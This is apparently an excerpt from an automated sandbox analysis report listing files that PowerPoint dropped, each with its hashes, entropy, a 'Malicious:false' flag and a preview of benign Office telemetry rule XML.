                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510022" V="2" DC="SM" EN="Office.DynamicCanvas.ShareWithMeeting.Unexportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cfya6" />.. <UTS T="2" Id="cfya7" />.. <UTS T="3" Id="cfya9" />.. <UTS T="4" Id="cfyar" />.. <UTS T="5" Id="cfyaw" />.. <UTS T="6" Id="cfybc" />.. <UTS T="7" Id="ck4zy" />.. <UTS T="8" Id="cnqph" />.. </S>.. <C T="U32" I="0" O="false" N="ShowBusBarCalled">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="InAppNotificationDisabled">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="U32" I="2" O="false" N="ConflictingBusBar">.. <C>.. <S T="3" />.. </C>.. </C>.. <C T="B" I="3" O="true" N="MeetingPickerResult">.. <S T="4" F="LaunchCanvasResult" />.. </C>.. <C T="U32" I="4" O="false" N="ShareDialogDisplayed">.. <C>.. <S T="5" />
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):784
                                                                                                                              Entropy (8bit):5.117216279155608
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdm/5eHR+NZ1S4OAQ4WnerMergNertZU/HaSMdLH+Qd/tOdy9wo/sONOS5csu:2doeUNZ17VrzrgYrDUyr+IQKa
                                                                                                                              MD5:4DA8F88DBEF978BC6E00F2CA4150A162
                                                                                                                              SHA1:330C2D777B05C580500535D5710689F4B4D639F0
                                                                                                                              SHA-256:FFD3BD35D170D2F968F472B51D086430141B34ADCE8892EA5FA566E5F9D110B1
                                                                                                                              SHA-512:753CB8B2B272D6E4BA86CDD326E84368CA0F90902472CBB0680DFDB25080C993518AF35B606AEEF3B56D2CFD149A16227E172BAAEE456EF39C0C47F382C8C896
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510023" V="0" DC="SM" EN="Office.DynamicCanvas.ShareWithMeeting.Exportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalBusinessImpact" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="cfya3" />.. <UTS T="2" Id="cfya4" />.. <UTS T="3" Id="cfyay" />.. </S>.. <C T="U32" I="0" O="false" N="ClickSharePresentationNotificationDescription">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="W" I="1" O="true" N="DismissSharePresentationNotification">.. <S T="2" F="PresentationId" />.. </C>.. <C T="W" I="2" O="true" N="SharePresentationFromNotification">.. <S T="3" F="PresentationId" />.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):457
                                                                                                                              Entropy (8bit):5.3513162915558885
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdRKPL73R+NZ1S4Hs14WnerJ0FSxMNO2su:2dRKUNZ17Hs1WruFb
                                                                                                                              MD5:67E2DC9607AF2631B6F58B36731228D0
                                                                                                                              SHA1:572E822C6ECED2786E4F2074178D3CD77DC08FE9
                                                                                                                              SHA-256:D18CD9928E7CF9294A8A5362BFFCEC8345612D165C68091F51BFA198C5DDA6B9
                                                                                                                              SHA-512:9B1B922AFD9D62A3DCB321EE3B59B52FED2C35FD3B983F015DEE561A9E4D28B337CC2430A5CCB6A428D1C100B21A8B91B5AC7A0067E0EFE1602712D8617B0D59
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510046" V="0" DC="SM" EN="Office.DynamicCanvas.Experience.OnboardingOobeEligibility.Unexportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="crhlm" />.. </S>.. <C T="U32" I="0" O="false" N="EligibilityCheck">.. <S T="1" F="FailedChecks" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):748
                                                                                                                              Entropy (8bit):5.092829408423781
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCO1i3R+NZ1S4Hs14WnerFer/erQ5ae/HaSMsHhSMnt9oSa9NOS5csu:2dC0BNZ17Hs1Wrwr2rrjq
                                                                                                                              MD5:9DF3DD3394A70CDD23091C799F4D5F3C
                                                                                                                              SHA1:EA2892FD56C37594D8A3EB6212852D11D8285DD5
                                                                                                                              SHA-256:A396714D0DC95E1FCDBD76165927AEF8BD76661531F23AA57797181303DBC125
                                                                                                                              SHA-512:8B979897CAC9F4FA97B5C42B9B4C80C8D6825C1DD48AB70405307B453A96FCD194BA05373A530516076D1F0BC9BCAC7A71D5C90FA3AA730B915568533DA1A40E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510047" V="0" DC="SM" EN="Office.DynamicCanvas.Experience.OnboardingOobeDialogResults.Unexportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="crhlp" />.. <UTS T="2" Id="crhls" />.. <UTS T="3" Id="crhlt" />.. </S>.. <C T="U8" I="0" O="false" N="ContentPackageNull">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="U8" I="1" O="false" N="ErrorEvent">.. <C>.. <S T="2" />.. </C>.. </C>.. <C T="B" I="2" O="true" N="LaunchCanvasResult">.. <S T="3" F="LaunchCanvasResult" />.. </C>.. <T>.. <S T="1" />.. <S T="2" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):727
                                                                                                                              Entropy (8bit):5.151550434787676
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdiwZnKQBXR+NZ1S4Hs14WnersPs2ndLStbImFdy95rvirgM45rhirTNO2su:2diCntBENZ17Hs1WrsP7OPqAGa5
                                                                                                                              MD5:4817919C584FB5E634A54C687251857C
                                                                                                                              SHA1:95ECE2080B02D18D91E1837BBAF996F33A7DDE46
                                                                                                                              SHA-256:3CCF35B64452C4FA06F0AECC677A9399BD8385631772D950AF3D0399256F25DA
                                                                                                                              SHA-512:B0597CE9111A01758EA74B303AFE9D3C32DE2923A664ED1940A47F911F4CDE92BDEED52A83FAE86FABCBC48A6DCACEA55E28420FE3FB9554C899AB1B186573C3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510062" V="0" DC="SM" EN="Office.DynamicCanvas.Experience.OnboardingOobeWelcomeVideo.CloseButtonClick.Exportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="97vre" />.. </S>.. <C T="W" I="0" O="true" N="ContextData">.. <S T="1" F="ContextData" />.. </C>.. <C T="W" I="1" O="true" N="CampaignName">.. <S T="1" F="CampaignName" />.. </C>.. <C T="W" I="2" O="true" N="ContentName">.. <S T="1" F="ContentName" />.. </C>.. <C T="U32" I="3" O="true" N="ContentNumber">.. <S T="1" F="ContentNumber" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):467
                                                                                                                              Entropy (8bit):5.342081553453761
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdiRnU3R+NZ1S4Hs14WnerKssQbSnNO2su:2diRnPNZ17Hs1WrK7
                                                                                                                              MD5:75EE22BD62CA4DCE37C6BC1140DDE0DB
                                                                                                                              SHA1:00E3F73268D1CD60EB0EFD94BD8E32CF18B0099B
                                                                                                                              SHA-256:DDC11CA6F80696A4C15B4B263AE212C8060605400A6F3956E11AC5DD2E26A870
                                                                                                                              SHA-512:3886D923C96965D776C4379B60142ADD6DFB66917631B5432C47E362667D2DC149C3C69436B3AEBAD45342CB8968ACD43B9651DD9437F8124283C23AE2C6128E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="510063" V="0" DC="SM" EN="Office.DynamicCanvas.Experience.OnboardingOobeWelcomeVideoHealth.Unexportable" ATT="350d24c16a934c2d9734791ed7301d8e-73bafc90-ca43-424c-815a-63b076120b49-6725" SP="CriticalExperimentation" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="97ven" />.. </S>.. <C T="W" I="0" O="true" N="ExperienceToplevelError">.. <S T="1" F="ContextData" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):389
                                                                                                                              Entropy (8bit):5.27198561301701
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd/NglkG5Rv92jWaEnhu+B5CHperhrknPoGmCmyNOn2sby:TMHdFEwanBaerklmPyNO2su
                                                                                                                              MD5:76361BF2DC7CFAC34FC112F6D186D72F
                                                                                                                              SHA1:56C19AD2A1AE8AA34C3C894D86E0FE60C0347148
                                                                                                                              SHA-256:6525ABCFEF842DBFA343AE95A86C31E6F5CB26B2640E7D856C12A4FA37016253
                                                                                                                              SHA-512:658DC02E869C1330F30EE07330FAAD0C8DE6E59700E54FD6192F84DF81402C757A668659666EB585AC03D864DE12407F647D6136ACEE7C31082F8AB3ECB49585
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="580000" V="1" DC="SM" EN="Office.Canvas.GraphImport.HomePageCacheStatus" ATT="625e97e3f60f498b93f637a1326ca839-4fa1bdd2-bae5-44a3-8d8c-a510d37d8472-7128" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cq03l" />.. </S>.. <C T="B" I="0" O="false" N="CacheValid">.. <S T="1" F="CacheValid" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2328
                                                                                                                              Entropy (8bit):4.951938354043482
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2du8EQrrOS0/+0P6i+oltli2lBliK9c0+oMwwFlulcLqRtNLROmpSpa6mvnbS8F6:cu8EQFllzcS2M8TfpSpazbS8o/
                                                                                                                              MD5:9026D95B179DD6518102FFC93C423BDF
                                                                                                                              SHA1:9FAC659D6D0B3C9DDEFCC53C21FBACBE6D17BEB8
                                                                                                                              SHA-256:CB24CAA5B49B6A77A0C37E4147015776DBC866F91D8D2D2366AC1111D4A4F5C1
                                                                                                                              SHA-512:B2CC67752A013E8872AEE4D56966E32467E11BE3D9078058684F47B7A0932C81E39BDF7CB16F19DDD55120DB3952F8F3A703514BFCB174560C8AD6AA4D270A0A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="580001" V="1" DC="SM" EN="Office.Canvas.GraphImport.LocalDocumentCandidateFeaturesFromTap" ATT="625e97e3f60f498b93f637a1326ca839-4fa1bdd2-bae5-44a3-8d8c-a510d37d8472-7128" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cs6pn" />.. </S>.. <C T="W" I="0" O="false" N="FullHashedDocUrl">.. <S T="1" F="FullHashedDocUrl" />.. </C>.. <C T="U32" I="1" O="false" N="DocumentShortHash">.. <S T="1" F="DocumentShortHash" />.. </C>.. <C T="G" I="2" O="false" N="CandidateGroupId">.. <S T="1" F="CandidateGroupId" />.. </C>.. <C T="W" I="3" O="false" N="DateTimeOffset">.. <S T="1" F="DateTimeOffset" />.. </C>.. <C T="W" I="4" O="false" N="LastAccessedLocalDateTime">.. <S T="1" F="LastAccessedLocalDateTime" />.. </C>.. <C T="W" I="5" O="false" N="LastModifiedLocalDateTime">.. <S T="1" F="LastModifiedLocalDateTime" />.. </C>.. <C T="W" I="6" O="false" N="Extension">.. <S T="1" F="Extension" />..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):532
                                                                                                                              Entropy (8bit):5.247175088835789
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdBQKcYwanBaerdb3KsjKg0XxKsEkXxKgNO2su:2dBfcE7r4jSNFI
                                                                                                                              MD5:591364F1AD5C63F19977C0AFBCC495F1
                                                                                                                              SHA1:DC6C08E715628543C02313CCB759E1E0469B2ABD
                                                                                                                              SHA-256:4F59F50EB02105C0F8064691ACCE4E963BE890999ECD79A32F16332A8CE9A559
                                                                                                                              SHA-512:9EB191B159640F9028BD0328458831A56E4AFD2B32D3BF759BB7ED81A242EFF51B2A2286D659255008B9F01C4B4A8948CEC011373DF2BF03274A22316F063DE9
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="580004" V="0" DC="SM" EN="Office.Canvas.GraphImport.TenantRootMismatch" ATT="625e97e3f60f498b93f637a1326ca839-4fa1bdd2-bae5-44a3-8d8c-a510d37d8472-7128" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cyvpr" />.. </S>.. <C T="U32" I="0" O="false" N="ServerTenantRootLength">.. <S T="1" F="ServerTenantRootLength" />.. </C>.. <C T="U32" I="1" O="false" N="EnterpriseTenantRootLength">.. <S T="1" F="EnterpriseTenantRootLength" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1151
                                                                                                                              Entropy (8bit):4.714131828094441
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdeNJoIV+d8WuXV4Wni0ycDQjEBzDLg5/e1lVYFjupfXd3TofNxdymO3cXHaSI:2deNJoIUen/SOc6PaY3T6gcyBYg
                                                                                                                              MD5:3145D9D851BBFA4F7C0DCC0A4E5EA751
                                                                                                                              SHA1:42B25D1941C414EF57502F7E2CF128184B3DA9FB
                                                                                                                              SHA-256:7ED3AF3A4CF89B61C8890E72E6DB81C3217C1C49791CF167DADCA42A4AC80244
                                                                                                                              SHA-512:C8D9FDD401429AB1414FAAE1776520AEF8779668DBA08C131F3AD554DBB0B163C61DA8B62528B632AD6D09942E75F6E82687B724834F008DCE1A5C47373A88CC
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63028" V="4" DC="SM" EN="Office.Identity.IdentityWarningsAggregation" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <R T="1" R="63052" />.. <TI T="2" I="Hourly" />.. <A T="3" E="TelemetrySuspend" />.. <A T="4" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. <F N="4" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="EndTime">.. <A T="MAX">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="W" I="1" O="false" N="Category">.. <S T="1" F="1" />.. </C>.. <C T="W" I="2" O="false" N="Tag">.. <S T="1" F="2" />.. </C>.. <C T="U32" I="3" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="FT" I="4" O="false" N="FirstTimeStamp">.. <A T="MIN">.. <S T="1" F="0" />.. </A>.. </C>.. <C T="I32" I="5" O="true" N="ErrorId">.. <S T="1" F="3" />.. </
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1006
                                                                                                                              Entropy (8bit):4.75723033832876
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d2sUenQrdrJrqYrmr+rrrhrp2rXkP0kS:c2sUenQhd/Civ1oDCS
                                                                                                                              MD5:57990533B82D23EF9FB4D0EDC5CC3AD5
                                                                                                                              SHA1:4D46DBBDFA1439D1B2983BE4EA1C26330BEA5EA7
                                                                                                                              SHA-256:97B698AB9B9FD2E3155D25191843159ABE8F66093D9CE22BEBDABE5E2959816D
                                                                                                                              SHA-512:FD3FD0C82F1BC693AF10629A39EEB985E23FAC6D488F2AACF242957F1AA48D9164CF9D9276DB0255B2A9D52737E4085B48584F310323E4C7D0A6304D3AF4BFF4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63030" V="2" DC="SM" EN="Office.Identity.Identity.Sign.In16.Prompt" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSP PSU" xmlns="">.. <S>.. <UTS T="1" Id="ax0z1" />.. <UTS T="2" Id="aysqq" />.. <UTS T="3" Id="aysrq" />.. <UTS T="4" Id="azfp5" />.. <UTS T="5" Id="a4dam" />.. <UTS T="6" Id="a4dao" />.. <UTS T="7" Id="a4dan" />.. <UTS T="8" Id="a4dap" />.. <UTS T="9" Id="aysr0" />.. <US T="10">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. <S T="7" />.. <S T="8" />.. <S T="9" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="Timestamp">.. <S T="10" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false" N="EventId">.. <S T="10" F="ULS_Tag" />.. </C>.. <C T="W" I="2" O="true" N="HrdAuthScheme">.. <S T="1" F="IdentityProvider" />.. </C>.. <T>.. <S T="10" />.. </T>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):927
                                                                                                                              Entropy (8bit):4.653908788373925
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdZb/ylySLjlertNereSeraer9kferDZahIffONf0SlVDH+6p1SbPSiNOFsu:2dNrtYreFrtrWWrmdPb
                                                                                                                              MD5:F5CBD2AAAB08F1A9983AE55EE25F0D75
                                                                                                                              SHA1:FD5E836B42D7C5E1F0A12E28A19394D248C682FF
                                                                                                                              SHA-256:FB5465ED4686D2C02E2C0EC7B11DFD53C8D0074CF474D7A45F84ABD696F1D640
                                                                                                                              SHA-512:0F54900FFACB566775B7F10AEC548E19DEA9187C65605806DF11C653C032F9B823BE0E0FFCEB2AB66B6132B75870B1DA0860A470E121B215D66B08540C04A4C7
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63038" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UCSS T="1" C="Identity OAuth2" S="Unexpected Monitorable Medium" />.. <UCSS T="2" C="Identity Third Party" S="Unexpected Monitorable Medium" />.. <UTS T="3" Id="baud9" />.. <UTS T="4" Id="a8s0f" />.. <UTS T="5" Id="a9a34" />.. <UTS T="6" Id="a6o7p" />.. <UTS T="7" Id="bbgck" />.. <US T="8">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. <S T="7" />.. </US>.. </S>.. <C T="FT" I="0" O="false">.. <S T="8" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false">.. <S T="8" F="ULS_Tag" />.. </C>.. <C T="U32" I="2" O="falseNoError">.. <S T="8" F="ErrorBucket" M="Ignore" />.. </C>.. <C T="I64" I="3" O="falseNoError">.. <S T="8" F="ErrorCode" M="Ignore" />.. </C>.. <T>.. <S T="8" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):934
                                                                                                                              Entropy (8bit):3.996991224242757
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdxljNi0ZPiJVluDLg5/W8/Lge1lVDBy+Nxdy9pSOn7PNW3mVP/k//Zx2Nf/07:2dz7Zq3BX5P/EPPD2+Y
                                                                                                                              MD5:D065C6DBC87E17EFD2A62E28337632E0
                                                                                                                              SHA1:57D91DB0D19404B832FC2396B98A1B1D281F5D04
                                                                                                                              SHA-256:C432814E76B5EFE46278A15CD50DCEE75480A28B4E38D9046181A7314CE2D280
                                                                                                                              SHA-512:A0CC0B0ED74F6515C1299E26EB111956845BBECD3ED336F70762834638244A259ED8620A076DA66574473F164002D3FD042365555FF98C595553F7CB5AE1340E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63040" V="2" DC="SM" T="Subrule" DCa="DC" xmlns="">.. <S>.. <R T="1" R="63042" />.. <R T="2" R="63040" />.. </S>.. <G>.. <S T="1">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. </S>.. <S T="2">.. <F N="1" />.. <F N="2" />.. <F N="4" />.. </S>.. </G>.. <C T="FT" I="0" O="false">.. <S T="1" F="0" />.. </C>.. <C T="TAG" I="1" O="false">.. <S T="1" F="1" />.. </C>.. <C T="W" I="2" O="true">.. <S T="1" F="2" />.. </C>.. <C T="U64" I="3" O="false">.. <O T="COALESCE">.. <L>.. <O T="ADD">.. <L>.. <S T="2" F="3" />.. </L>.. <R>.. <V V="1" T="U64" />.. </R>.. </O>.. </L>.. <R>.. <V V="1" T="U64" />.. </R>.. </O>.. </C>.. <C T="W" I="4" O="true">.. <S T="1" F="3" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1481
                                                                                                                              Entropy (8bit):4.315384231229811
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d3UenMZ3QTmTPFMdPIPu/PMsrOEzPvPmzP53E:c3UenZmTt/Ei6
                                                                                                                              MD5:30D4408E96A15926287644B2E5CA8EBD
                                                                                                                              SHA1:E08BE25D468586F804354A9EF6E31DC4AB930948
                                                                                                                              SHA-256:9EDC3B6847D5CDA98635726EAAECBBDBD8D2297D6B1C3FBE97F8A94267AC12A9
                                                                                                                              SHA-512:9BFAF553146897A850ADC3C1576C0AD897329F3C141AD91F2A05B5F8469D24CBE5B9B5E3C97F89C524BD9C6F5D9D9DDFB076A6D3FE1F7D11A22E587EB33BA404
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63041" V="2" DC="SM" EN="Office.Identity.GetAuthenticatedServiceTicketCadence" ATT="5c65bbc4edbf480d9637ace04d62bd98-12844893-8ab9-4dde-b850-5612cb12e0f2-7822" DCa="PSU" xmlns="">.. <S>.. <R T="1" R="63040" />.. <R T="2" R="63041" />.. <R T="3" R="120100" />.. <F T="4">.. <O T="EQ">.. <L>.. <S T="1" F="3" />.. </L>.. <R>.. <V V="1" T="U64" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="4">.. <F N="1" />.. <F N="2" />.. <F N="4" />.. </S>.. <S T="2">.. <F N="1" />.. <F N="2" />.. <F N="3" />.. </S>.. </G>.. <C T="FT" I="0" O="false" N="Timestamp">.. <O T="COALESCE">.. <L>.. <S T="3" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="4" F="0" />.. </R>.. </O>.. </C>.. <C T="TAG" I="1" O="false" N="Tag">.. <O T="COALESCE">.. <L>.. <S T="4" F="1" />.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):670
                                                                                                                              Entropy (8bit):4.785986914937611
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdUAOber6QEQNerMSNahSlVD4+eIdy9pSCl5sdVpSCIpRNOcsu:2dUAnr6QE5rTlPjMHQtIT
                                                                                                                              MD5:121B42603FA4FA67C0A0816AA83E7245
                                                                                                                              SHA1:5B3EC40B7FA93D1810E127BF3E3F93D8F7105827
                                                                                                                              SHA-256:D7D3317FABD46CE829ED191B4C92E8A7D8E89F21A68FAA0F5A7632D0D07C86D6
                                                                                                                              SHA-512:05C5A167BA7E02A679309B8619F3731F36A4D5BF6834B5487F36E8BD48BA0994EE4B616594655E014900FD6567B19C25A78FF6FB774427A17BD5678A6EB46B80
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63042" V="3" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="awutb" A="awuxw bbvox bb9d3 bb9ed bb9ee" />.. <UTS T="2" Id="bb9d5" A="bb9d4 bhgns awuv5" />.. <US T="3">.. <S T="1" />.. <S T="2" />.. </US>.. </S>.. <C T="FT" I="0" O="false">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false">.. <S T="3" F="ULS_Tag" />.. </C>.. <C T="W" I="2" O="true">.. <S T="3" F="IdentityMetadata_IdentityProviderType" M="Ignore" />.. </C>.. <C T="W" I="3" O="true">.. <S T="3" F="IdentityMetadata_LibraryType" M="Ignore" />.. </C>.. <T>.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1616
                                                                                                                              Entropy (8bit):4.71516383376384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dfrx8ZNP0kKk1+rQQP4PuetyxK/EczQss:cfAG3r+7QV
                                                                                                                              MD5:F596D1DC61FFB503CA5181CBF5B11555
                                                                                                                              SHA1:4908C8C9042BF64FB3E440D1645475706F9A3067
                                                                                                                              SHA-256:6D741F5EDADD38BB4D471A50B920CF11CDB89F6F4E61C93830FF9886E7C4CA01
                                                                                                                              SHA-512:BBF75E0D1BCD98B4ECEA98C6733ED8DCD6C4B6FF93A1AA615230617552A745FBE225101DD005D5219C95C229B298341C5E9958F193BA441C4FFF0107DC53E57D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="63046" V="10" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="bb9ef" A="azusw a18zb ax73j awuxy awupo bex9n awuxx azusx bb9eg awupn bb0g8 a99q0 bqo4s bdvux bdvuy awutc bdvuz awutd bdvu0 bdvu1 bjljc bjljd bjlje bjljf" />.. </S>.. <C T="FT" I="0" O="false">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="2" O="true">.. <S T="1" F="Target" M="Ignore" />.. </C>.. <C T="W" I="3" O="true">.. <S T="1" F="Policy" M="Ignore" />.. </C>.. <C T="W" I="4" O="true">.. <S T="1" F="IdentityMetadata_IdentityProviderType" M="Ignore" />.. </C>.. <C T="W" I="5" O="true">.. <O T="COALESCE">.. <L>.. <O T="COALESCE">.. <L>.. <S T="1" F="IdentityMetadata_IdentityErrorState" M="Ignore" />.. </L>.. <R>.. <S T="1" F="ErrorState" M="Ignore" />.. </R>.. </O>.. </L>.. <R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3787
                                                                                                                              Entropy (8bit):4.4616521769015565
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cjUenQ2TzXAvF3YqYKMfxQgQwat5ocQER4KMPB7:MfamfxjMocQERip7
